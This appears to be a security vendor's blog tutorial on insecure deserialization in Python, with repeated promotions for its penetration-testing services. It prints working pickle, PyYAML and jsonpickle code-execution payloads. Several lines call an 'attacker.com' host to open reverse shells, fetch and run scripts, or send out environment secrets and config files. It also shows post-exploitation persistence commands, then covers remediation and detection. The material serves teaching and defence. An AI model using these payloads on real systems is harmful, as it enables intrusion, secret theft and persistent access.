Insecure Deserialization in Python: Exploits & Defenses

Date: July 15, 2025

Author: Karan Patel, CEO

If you are a developer, security engineer, or architect working with Python applications, understanding insecure deserialization is not optional. It is a prerequisite for building systems that survive contact with real-world adversaries.

This post walks you through what insecure deserialization is, how attackers exploit it in Python, working proof-of-concept commands, and how to remediate it before it costs you.

What Is Serialization and Why Does It Matter

Serialization is the process of converting an in-memory object into a format that can be stored or transmitted, such as a byte stream, JSON blob, or XML document. Deserialization is the reverse: reconstructing the object from that format back into memory.

Serialization is used everywhere: session tokens, API payloads, caching layers, message queues, inter-process communication, and file storage. When the deserialization process trusts external input without validation, attackers can supply a crafted payload that forces the application to execute arbitrary code, escalate privileges, or exfiltrate data.

The root problem is not the concept of serialization itself. It is when applications deserialize data from untrusted sources using libraries that execute code during the reconstruction process.
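As a minimal sketch of the round trip described above, the snippet below serializes a dictionary to JSON and reconstructs it. The `session` dictionary and its field names are illustrative assumptions, not taken from any real application. The point is that a data-only format such as JSON yields only basic types (dicts, lists, strings, numbers, booleans) on the way back in and never invokes code during parsing.

```python
import json

# Hypothetical session data, used only for illustration.
session = {"user_id": 42, "roles": ["viewer"], "active": True}

wire_format = json.dumps(session)     # serialize: object -> text
restored = json.loads(wire_format)    # deserialize: text -> object

# The reconstructed value is plain data with the same content.
print(type(wire_format).__name__, restored == session)
```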

Python's Most Dangerous Serialization Libraries

The pickle Module

Python's built-in pickle module is the most notorious offender. The official Python documentation itself warns that pickle is not secure against maliciously constructed data. Despite this, it remains widely used in data science pipelines, ML model storage, caching systems, and session management.

Pickle allows objects to define a __reduce__ method that controls how they are serialized and, critically, deserialized. Attackers abuse this to embed OS commands inside a pickled payload.
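To make the mechanism concrete without running anything harmful, here is a small sketch in which `__reduce__` returns the harmless built-in `sorted`. The class name `Demo` is an assumption for illustration. Note that `pickle.loads()` does not hand back a `Demo` instance at all; it hands back whatever the callable returns, which is exactly the behavior attackers rely on.

```python
import pickle

class Demo:
    """Illustrative class: tells pickle to rebuild it by calling sorted()."""
    def __reduce__(self):
        # (callable, args): pickle stores a reference to the callable and
        # invokes callable(*args) at load time.
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(Demo())
result = pickle.loads(blob)   # calls sorted([3, 1, 2]) during loading

print(result)                 # the callable's return value, not a Demo object
```

Swapping `sorted` for a function that runs shell commands is the only change an attacker needs, which is why the callable reference inside a pickle must be treated as code.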

Generating a malicious pickle payload:

import pickle
import os

class MaliciousPayload(object):
    def __reduce__(self):
        # pickle will call os.system('id') when this object is loaded
        return (os.system, ('id',))

payload = pickle.dumps(MaliciousPayload())
print(payload)

Triggering execution on the target:

import pickle

# Simulating what a vulnerable application does
data = b'\x80\x04\x95...'  # Attacker-supplied bytes
pickle.loads(data)         # This executes: os.system('id')

When the application calls pickle.loads() on attacker-controlled data, the command runs. There is no sandbox. There is no prompt. The payload executes in the context of the running process.
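Because loading is what triggers execution, one defensive option is to inspect a payload's opcodes without loading it. The sketch below uses the standard library's `pickletools.genops()`, which parses a pickle stream without executing it, and lists opcodes that import or call objects. The function name `risky_opcodes` and the chosen opcode set are assumptions for illustration; treat this as a triage aid, not a sandbox or a guarantee of safety.

```python
import pickle
import pickletools

# Opcodes that import names or invoke callables during unpickling.
# This set is an illustrative assumption, not an exhaustive policy.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def risky_opcodes(data: bytes) -> list[str]:
    """Return names of suspicious opcodes found in a pickle, without loading it."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in SUSPICIOUS]

class Demo:
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))   # harmless stand-in for a callable

print(risky_opcodes(pickle.dumps({"id": 1})))   # plain data
print(risky_opcodes(pickle.dumps(Demo())))      # imports and calls a function
```

A plain dictionary produces no flagged opcodes, while any object that relies on `__reduce__` shows an import opcode followed by `REDUCE`.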

Reverse shell via pickle:

import pickle
import os

class ReverseShell(object):
    def __reduce__(self):
        cmd = "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
        return (os.system, (cmd,))

payload = pickle.dumps(ReverseShell())

# On attacker machine: nc -lvnp 4444
# Victim app receives and loads this payload

This is not theoretical. This exact technique has been used to compromise ML serving platforms, Flask-based APIs using pickled sessions, and internal tooling that caches Python objects.

If your organization's Python applications are handling serialized data from external sources, you need a professional assessment to determine your exposure. Redfox Cybersecurity's penetration testing services cover deserialization attack chains as part of a comprehensive web application engagement.

PyYAML and the yaml.load() Vulnerability

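YAML is widely used for configuration files, CI/CD pipelines, and API data. PyYAML's yaml.load() function, when called with an unsafe loader (yaml.Loader or yaml.UnsafeLoader), supports Python-specific tags that allow object instantiation during parsing. Before PyYAML 5.1, calling yaml.load() with no Loader argument used the unsafe loader by default. Since PyYAML 6.0 the Loader argument is required, so the risk today comes from legacy versions and from code that passes an unsafe loader explicitly.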

Vulnerable code:

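import yaml

# Dangerous: an unsafe loader is used on user-controlled input.
# (Old PyYAML releases behaved this way when no Loader was specified.)
data = yaml.load(user_input, Loader=yaml.UnsafeLoader)

Attacker-supplied YAML payload: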

!!python/object/apply:os.system
args: ['curl http://attacker.com/shell.sh | bash']

When the application processes this string through yaml.load() with an unsafe loader, it executes the shell command. This is a one-liner exploit that requires no authentication bypass, no memory corruption, and no complex tooling.

Demonstrating the exploit:

python3 -c "
import yaml
payload = \"!!python/object/apply:os.system ['id']\"
yaml.load(payload, Loader=yaml.UnsafeLoader)
"

Output: The id command executes and prints the current user context of the process.

This class of vulnerability has affected well-known projects including Ansible and various DevOps tools. Any Python application that parses YAML from user-controlled input without using yaml.safe_load() is at risk.
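As a hedged illustration of the difference, the sketch below feeds an ordinary document and a tagged document to `yaml.safe_load()`, which refuses to construct Python objects and raises an error instead. It assumes PyYAML is installed; the helper name `try_safe_load` is hypothetical.

```python
import yaml  # third-party: PyYAML (assumed to be installed)

def try_safe_load(text: str):
    """Parse YAML with the safe loader; return (value, error_name)."""
    try:
        return yaml.safe_load(text), None
    except yaml.YAMLError as exc:
        # Python-specific tags are rejected by the safe loader.
        return None, type(exc).__name__

print(try_safe_load("name: demo\nreplicas: 3"))
print(try_safe_load("!!python/object/apply:os.system ['id']"))
```

The first call returns a plain dictionary. The second returns no value and reports a YAML error, and the command is never run.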

jsonpickle: Dangerous by Design

jsonpickle is a library that serializes arbitrary Python objects to JSON. Unlike standard JSON, it preserves Python type information by embedding class references directly in the serialized output. This makes it trivially exploitable.

Crafting a jsonpickle RCE payload:

import jsonpickle

class Exploit(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('id')",))

serialized = jsonpickle.encode(Exploit())
print(serialized)
# Output: {"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": [...]}]}

Any application calling jsonpickle.decode() on this string will execute the embedded command.

Sending the payload over HTTP:

curl -X POST http://target.com/api/deserialize \
  -H "Content-Type: application/json" \
  -d '{"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": ["__import__(\"os\").system(\"id\")"]}]}'

If the endpoint passes the body through jsonpickle.decode(), code execution is immediate.
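One cautious pattern is to parse the body with the standard `json` module first and reject anything carrying jsonpickle's type tags before it gets near `jsonpickle.decode()`. The sketch below assumes that such tags are dictionary keys beginning with `py/`, as in the payload above; the function name `find_py_tags` is hypothetical. It is a defense-in-depth filter, not a replacement for keeping untrusted input away from `jsonpickle.decode()`.

```python
import json

def find_py_tags(node) -> list[str]:
    """Recursively collect dictionary keys that start with 'py/'."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(key, str) and key.startswith("py/"):
                found.append(key)
            found.extend(find_py_tags(value))
    elif isinstance(node, list):
        for item in node:
            found.extend(find_py_tags(item))
    return found

body = '{"py/reduce": [{"py/function": "builtins.eval"}, {"py/tuple": ["1+1"]}]}'
tags = find_py_tags(json.loads(body))   # plain json parsing never runs code
print(tags)
```

An endpoint that expects ordinary JSON could return an error whenever this list is non-empty.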

shelve and marshal

Python's shelve module uses pickle internally to store objects, meaning any application that reads shelve databases from untrusted sources inherits all of pickle's vulnerabilities.
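The following sketch illustrates that claim under a few assumptions: it writes one value to a temporary shelf, then reads the raw stored bytes back through the `dbm` module and checks for the pickle protocol header. The file name and key are arbitrary, and the exact `dbm` backend varies by platform.

```python
import dbm
import os
import shelve
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "demo_shelf")   # arbitrary illustrative name

    with shelve.open(path) as shelf:
        shelf["user"] = {"id": 1}

    # Read the underlying database directly, bypassing shelve.
    with dbm.open(path, "r") as raw:
        stored = raw[b"user"]

# shelve stored a pickle: byte 0x80 is the PROTO opcode, '.' is STOP.
is_pickle = stored[:1] == b"\x80" and stored.endswith(b".")
print(is_pickle)
```

Anyone who can write to that database file controls the bytes that a later `shelve.open()` will unpickle.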

marshal supports a narrower set of types, but it is no safer: the Python documentation explicitly states that it is not intended to be secure against erroneous or maliciously constructed data, so it should never be used to deserialize data from external sources.

import marshal

# Dangerous: deserializing attacker-controlled marshal data
code = marshal.loads(attacker_bytes)
exec(code)  # Arbitrary code execution

How Attackers Identify Deserialization Vulnerabilities

Understanding the attacker's reconnaissance workflow helps defenders think like threat actors.

Step 1: Fingerprint the application stack

# Look for Python framework indicators in HTTP headers
curl -I http://target.com

# Check for Flask, Django, FastAPI signatures
# X-Powered-By, Server headers, error pages

Step 2: Intercept and decode serialized tokens

# Base64-decode suspicious cookies or parameters
echo "gASVHgAAAAAAAAB9lCiMAmlklEsBjARuYW1llIwFYWRtaW6Uu..." | base64 -d | xxd | head

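A leading \x80 byte followed by a protocol number (for example \x80\x03, \x80\x04, or \x80\x05) indicates a pickle payload using protocol 2 or later. When Base64-encoded, a protocol 4 pickle typically starts with gASV. Attackers immediately know what library to target.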
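Defenders can apply the same fingerprint to their own traffic. The sketch below is a heuristic, written under the assumption that tokens use standard (not URL-safe) Base64; the function name `looks_like_pickle` is hypothetical. It only decodes and inspects bytes, and never calls `pickle.loads()` on the token.

```python
import base64
import binascii
import pickle

def looks_like_pickle(token: str) -> bool:
    """Heuristic: does this Base64 string decode to a protocol 2+ pickle?"""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    # PROTO opcode (0x80), a plausible protocol number, and a trailing STOP ('.').
    return (len(raw) >= 3 and raw[0] == 0x80
            and 2 <= raw[1] <= pickle.HIGHEST_PROTOCOL
            and raw.endswith(b"."))

sample = base64.b64encode(pickle.dumps({"id": 1, "name": "admin"})).decode()
print(looks_like_pickle(sample))                 # a real pickle
print(looks_like_pickle("aGVsbG8gd29ybGQ="))     # Base64 of "hello world"
```

Running a check like this over cookies and parameters captured in a proxy log is one way to find places where an application accepts pickled data from clients.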

Step 3: Generate and encode the exploit payload

import pickle, os, base64

class Exploit:
    def __reduce__(self):
        return (os.system, ('curl http://attacker.com/exfil?u=$(whoami)',))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)

Step 4: Deliver the payload

# Inject into a cookie
curl http://target.com/dashboard \
  -H "Cookie: session=gASV..."

# Inject into a POST parameter
curl -X POST http://target.com/api/upload \
  -d "data=gASV..."

Step 5: Catch the callback

# On attacker machine, start a listener
nc -lvnp 80

# Or use a Burp Collaborator / interactsh instance

This five-step chain is what a real attacker executes. The window between an unpatched deserialization endpoint and full server compromise is minutes, not hours.

Want to know if your applications are vulnerable to this exact chain before attackers find it? Request a penetration test from Redfox Cybersecurity and get a professional, evidence-based assessment of your attack surface.

Real-World Impact: What Attackers Do After Initial Access

Gaining code execution through a deserialization vulnerability is only the beginning. Post-exploitation steps commonly include:

Privilege escalation:

# Check sudo rights
sudo -l

# Look for SUID binaries
find / -perm -4000 2>/dev/null

# Check for writable cron jobs
ls -la /etc/cron*

Lateral movement within the network:

# Scan internal network from the compromised host
python3 -c "
import socket
for port in [22, 80, 443, 3306, 5432, 6379, 27017]:
    s = socket.socket()
    s.settimeout(0.5)
    result = s.connect_ex(('10.0.0.1', port))
    if result == 0:
        print(f'Port {port} open')
    s.close()
"

Data exfiltration:

# Dump environment variables (often contains secrets, API keys, DB credentials)
env | base64 | curl -X POST http://attacker.com/collect -d @-

# Steal application secrets
cat /app/config.py | base64 | curl -X POST http://attacker.com/collect -d @-

Persistence:

# Add SSH key to authorized_keys
echo "ssh-rsa AAAA...attacker-key..." >> ~/.ssh/authorized_keys

# Write a cron job for persistent reverse shell
echo "* * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1" | crontab -

A single deserialization endpoint can be the entry point for a full organizational breach. This is not a theoretical risk. It is the documented kill chain behind multiple high-profile ransomware deployments and data theft incidents.

Secure Remediation: How to Fix Insecure Deserialization in Python

Never Deserialize Untrusted Data with pickle

The simplest fix is to never use pickle, shelve, or marshal with data from external sources. There is no safe way to sandbox pickle deserialization in Python.

Switch to safer alternatives for data interchange:

import json

# Serialize
data = {"user_id": 1, "role": "admin"}
serialized = json.dumps(data)

# Deserialize safely
parsed = json.loads(serialized)

JSON, msgpack, and protobuf are appropriate formats for transmitting structured data between services. They do not execute code during parsing.
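A minimal sketch of that approach for application objects, assuming a hypothetical `UserSession` type: instead of pickling the object, convert it to a plain dictionary for JSON and rebuild it through an explicit function that checks field names and types. All names here are illustrative.

```python
import json
from dataclasses import asdict, dataclass

@dataclass
class UserSession:            # hypothetical type, for illustration only
    user_id: int
    role: str

def dump_session(session: UserSession) -> str:
    return json.dumps(asdict(session))

def load_session(text: str) -> UserSession:
    data = json.loads(text)
    # Explicit checks: only the expected fields and types are accepted.
    if not isinstance(data, dict) or set(data) != {"user_id", "role"}:
        raise ValueError("unexpected fields")
    if type(data["user_id"]) is not int or not isinstance(data["role"], str):
        raise ValueError("unexpected field types")
    return UserSession(user_id=data["user_id"], role=data["role"])

restored = load_session(dump_session(UserSession(1, "admin")))
print(restored)
```

The receiving side decides which class to build and from which fields, so the incoming bytes never get to name a class or a callable.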

Use yaml.safe_load() Instead of yaml.load()

import yaml

# Vulnerable: unsafe loader on untrusted input
data = yaml.load(user_input, Loader=yaml.UnsafeLoader)

# Secure
data = yaml.safe_load(user_input)

yaml.safe_load() only parses standard YAML types (strings, integers, lists, dicts) and does not support Python-specific tags that allow object instantiation.

Validate and Sign Serialized Data

If you must use pickle internally (for example, in ML pipelines where models are serialized), implement cryptographic signing to verify integrity before deserialization.

import pickle
import hmac
import hashlib

# Load the key from a secret store or environment variable in real deployments
SECRET_KEY = b'your-secret-key-here'

def serialize_signed(obj):
    data = pickle.dumps(obj)
    signature = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest()
    return signature.encode() + b':' + data

def deserialize_verified(blob):
    sig, data = blob.split(b':', 1)
    expected_sig = hmac.new(SECRET_KEY, data, hashlib.sha256).hexdigest().encode()
    # Compare as bytes so a non-ASCII signature cannot raise during comparison
    if not hmac.compare_digest(sig, expected_sig):
        raise ValueError("Invalid signature: data may have been tampered with")
    return pickle.loads(data)

This ensures that only data signed with your key can be deserialized, which holds only as long as the key stays secret. Attacker-crafted payloads will fail the signature check before pickle.loads() is ever called.
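The sketch below shows the signature check rejecting a modified blob. It is a variant of the approach above, not the same code: it prefixes a fixed-length raw digest instead of a hex string and delimiter, and it reads the key from an environment variable. The variable name `APP_SIGNING_KEY`, the function names, and the fallback key are assumptions made so the example runs on its own.

```python
import hashlib
import hmac
import os
import pickle

# Assumption: the key comes from an environment variable named APP_SIGNING_KEY.
# The fallback exists only so this sketch runs; never ship a default key.
KEY = os.environ.get("APP_SIGNING_KEY", "dev-only-key").encode()
DIGEST_SIZE = hashlib.sha256().digest_size   # 32 bytes

def sign_and_pack(obj) -> bytes:
    data = pickle.dumps(obj)
    return hmac.new(KEY, data, hashlib.sha256).digest() + data

def verify_and_load(blob: bytes):
    sig, data = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("signature mismatch")
    return pickle.loads(data)   # reached only for data signed with KEY

blob = sign_and_pack({"model": "v1"})
print(verify_and_load(blob))

tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])   # flip one bit in the payload
try:
    verify_and_load(tampered)
except ValueError as exc:
    print("rejected:", exc)
```

Signing proves who produced the bytes. It does nothing to make the pickle itself safe, so anyone who obtains the key can still forge a payload that executes code.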

Implement Allowlist-Based Deserialization

For cases where you need to support custom object types, use a custom unpickler that restricts which classes can be instantiated.

import pickle
import io

ALLOWED_CLASSES = {
    ('myapp.models', 'UserSession'),
    ('myapp.models', 'CartItem'),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_CLASSES:
            raise pickle.UnpicklingError(
                f"Blocked: {module}.{name} is not in the allowlist"
            )
        return super().find_class(module, name)

def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

This approach stops arbitrary class instantiation while still allowing your application's own object types to be deserialized.
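To see the allowlist in action without the hypothetical `myapp.models` package, the self-contained sketch below allows only `collections.OrderedDict` and then tries to load a payload whose `__reduce__` points at `os.getcwd`, used here as a harmless stand-in for `os.system`. The names `AllowlistUnpickler`, `restricted_loads`, and `Probe` are illustrative.

```python
import io
import os
import pickle
from collections import OrderedDict

# Illustrative allowlist; a real one would name your application's classes.
ALLOWED = {("collections", "OrderedDict")}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()

class Probe:
    def __reduce__(self):
        return (os.getcwd, ())   # harmless stand-in for os.system

print(restricted_loads(pickle.dumps(OrderedDict(a=1))))   # allowed class

try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    print(exc)   # the callable is refused before it can be invoked
```

The rejection happens when the unpickler resolves the name, which is before the callable could be invoked. Keep the allowlist as small as possible, since any allowed class with dangerous side effects reopens the hole.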

Adopt Structured Serialization Formats

For service-to-service communication, move to schema-validated formats:

import json

# Using Protocol Buffers
from google.protobuf import message

# Using Pydantic for schema validation
from pydantic import BaseModel

class UserPayload(BaseModel):
    user_id: int
    role: str
    permissions: list[str]

# Validation happens automatically; no code execution possible
# incoming_data is the raw JSON request body
user = UserPayload(**json.loads(incoming_data))

Pydantic validates structure and types but does not instantiate arbitrary Python classes. It is a safe, production-grade alternative for API payload validation.

Detection: How to Find Deserialization Vulnerabilities in Your Codebase

Grep for dangerous patterns in your Python codebase:

# Find all pickle usage
grep -rn "pickle.loads\|pickle.load\|cPickle.loads" ./src

# Find unsafe YAML loading
grep -rn "yaml.load(" ./src | grep -v "safe_load"

# Find jsonpickle decode calls
grep -rn "jsonpickle.decode\|jsonpickle.loads" ./src

# Find marshal usage
grep -rn "marshal.loads\|marshal.load" ./src

# Find shelve usage with external data
grep -rn "shelve.open" ./src

Automate static analysis with Bandit:

pip install bandit
bandit -r ./src -t B301,B302,B506

Bandit rule B301 flags pickle calls, B302 flags marshal calls, and B506 flags unsafe yaml.load(). Integrate this into your CI/CD pipeline so vulnerabilities are caught before they reach production.
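For intuition about what such static checks do, here is a rough sketch that walks a file's syntax tree with the standard `ast` module and reports calls to a handful of deserialization functions. The names `RISKY_CALLS` and `find_risky_calls` and the list of flagged calls are assumptions for illustration; this is not how Bandit is implemented, and it misses aliased imports such as `from pickle import loads`.

```python
import ast

# Call names to flag; an illustrative subset, not Bandit's actual rule set.
RISKY_CALLS = {"pickle.load", "pickle.loads", "marshal.load", "marshal.loads",
               "yaml.load", "jsonpickle.decode", "shelve.open"}

def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return (line_number, dotted_name) for each flagged call in the source."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and isinstance(node.func.value, ast.Name)):
            dotted = f"{node.func.value.id}.{node.func.attr}"
            if dotted in RISKY_CALLS:
                hits.append((node.lineno, dotted))
    return sorted(hits)

sample = "import pickle, json\nobj = pickle.loads(blob)\ncfg = json.loads(text)\n"
print(find_risky_calls(sample))
```

Unlike a plain grep, a syntax-tree check ignores matches inside comments and string literals, which cuts down on false positives.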

Dynamic scanning with custom payloads:

# Generate a detection payload that makes an out-of-band DNS request
python3 -c "
import pickle, os, base64
class Probe:
    def __reduce__(self):
        return (os.system, ('nslookup your-collaborator-id.oast.me',))
print(base64.b64encode(pickle.dumps(Probe())).decode())
"

Inject this into every parameter, cookie, and request body that appears to accept serialized data. If you receive a DNS callback, the endpoint is vulnerable.

Running these detection steps manually across a large application surface is time-intensive, and vulnerable endpoints are easy to miss. Professional penetration testing automates and validates this process across your entire attack surface. Engage Redfox Cybersecurity to conduct a thorough assessment of your Python applications, APIs, and internal tooling.

Closing Thoughts

Insecure deserialization in Python is not a niche vulnerability. It sits at the intersection of trusted libraries, common development patterns, and catastrophic impact. The Python ecosystem's reliance on pickle for ML model storage, session management, and caching means that the exposure is far broader than most development teams realize.

The attack primitives are well-documented, the tooling is publicly available, and the path from a deserialization endpoint to full server compromise is short. Developers need to treat serialized data from external sources the same way they treat SQL input: as inherently untrusted, requiring explicit validation and safe handling patterns.

Remediation starts with code: replace pickle with JSON or protobuf, switch yaml.load to yaml.safe_load, validate schemas with Pydantic, and integrate Bandit into your CI pipeline. But code review alone does not find everything. Runtime behavior, third-party dependencies, and undocumented internal endpoints often carry deserialization vulnerabilities that static analysis cannot surface.

That is where professional security testing closes the gap. Redfox Cybersecurity's penetration testing services combine automated scanning with manual exploitation techniques to identify deserialization vulnerabilities, prove impact through controlled exploitation, and deliver actionable remediation guidance your engineering team can act on immediately.

Do not wait for a breach to discover your exposure. Get ahead of it.
